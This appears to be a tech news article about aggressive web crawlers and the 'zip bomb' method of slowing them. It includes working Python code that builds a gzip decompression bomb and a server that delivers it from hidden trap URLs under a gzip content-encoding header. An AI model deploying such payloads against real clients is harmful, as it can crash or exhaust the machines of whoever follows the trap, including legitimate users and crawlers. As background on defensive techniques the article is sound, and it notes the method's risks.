Increased Activity of Web Bots
Recently, the activity of web bots that index content has increased significantly. Alongside correctly behaving bots, there are aggressive bots that ignore the robots.txt indexing rules, crawl from tens of thousands of different IP addresses, pretend to be legitimate users, and do not adhere to any reasonable request-rate policy. These bots create a huge parasitic load on servers, disrupt the normal operation of systems, and waste administrators' time. Many perceive the activity of such bots as malicious.
Use of “Zip Bombs” to Slow Down Bots
As a measure for slowing down such bots, as well as bots scanning typical web applications for vulnerabilities, one administrator proposed the “zip bomb” method. The essence of the method is that, in response to a page request, the server returns content that compresses extremely well with the Deflate method, so that its unpacked size is many times larger than the amount of data transferred over the network. For example, when using Deflate, the contents of /dev/zero packed into 10 MB will require 1 GB of disk space to unpack. With the brotli compression method, a ratio was achieved at which transmitting 81 MB results in 100 TB of data after decompression.
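The following is a minimal sketch of how such a payload could be generated; it is not the exact tool the article describes. The file name and target size are illustrative assumptions; it simply writes a stream of zero bytes through gzip (which uses Deflate), producing a small file that expands to a much larger size when decompressed.

```python
# Hypothetical sketch: generate a gzip (Deflate) "bomb" consisting of zero bytes.
# The file name and size below are assumptions for illustration only.
import gzip


def make_gzip_bomb(uncompressed_size: int, path: str = "bomb.gz") -> None:
    """Write a gzip file that expands to `uncompressed_size` bytes of zeros."""
    chunk = b"\0" * (1 << 20)  # 1 MiB of zero bytes; compresses extremely well
    with gzip.open(path, "wb", compresslevel=9) as f:
        remaining = uncompressed_size
        while remaining > 0:
            n = min(remaining, len(chunk))
            f.write(chunk[:n])
            remaining -= n


if __name__ == "__main__":
    # 1 GiB of zeros typically shrinks to roughly 1 MB with Deflate/gzip.
    make_gzip_bomb(1 << 30)
```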
Activation of Protection Through Traps
Such protection can be activated by creating traps: pages reachable only through invisible links marked with the rel="nofollow" attribute, excluded from indexing via robots.txt, and triggered only at a fairly deep level of recursion, so they catch bots that try to pose as ordinary users. In practice, the proposed method is not recommended, since if the Google bot accidentally indexes such a trap, the site can be blacklisted and start being flagged as harmful by the Chrome browser's Safe Browsing mode.
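For illustration only, here is a hedged sketch of how a pre-generated compressed payload could be served from a trap URL; it is not the author's implementation. The trap path, port, and file name are assumptions, and it reuses the bomb.gz file from the previous example. The key point is the Content-Encoding: gzip header, which tells a client that honors HTTP compression to inflate the entire payload.

```python
# Hypothetical sketch: serve a pre-generated gzip bomb from a trap path.
# TRAP_PREFIX, BOMB_PATH, and the port are illustrative assumptions.
from http.server import BaseHTTPRequestHandler, HTTPServer

TRAP_PREFIX = "/trap/"   # hidden behind an invisible rel="nofollow" link
BOMB_PATH = "bomb.gz"    # pre-generated compressed payload (see earlier sketch)


class TrapHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path.startswith(TRAP_PREFIX):
            # Declare the body as gzip-compressed HTML; a client that honors
            # Content-Encoding will attempt to decompress the whole payload.
            with open(BOMB_PATH, "rb") as f:
                payload = f.read()
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.send_header("Content-Encoding", "gzip")
            self.send_header("Content-Length", str(len(payload)))
            self.end_headers()
            self.wfile.write(payload)
        else:
            # Everything outside the trap path is left alone in this sketch.
            self.send_response(404)
            self.end_headers()


if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), TrapHandler).serve_forever()
```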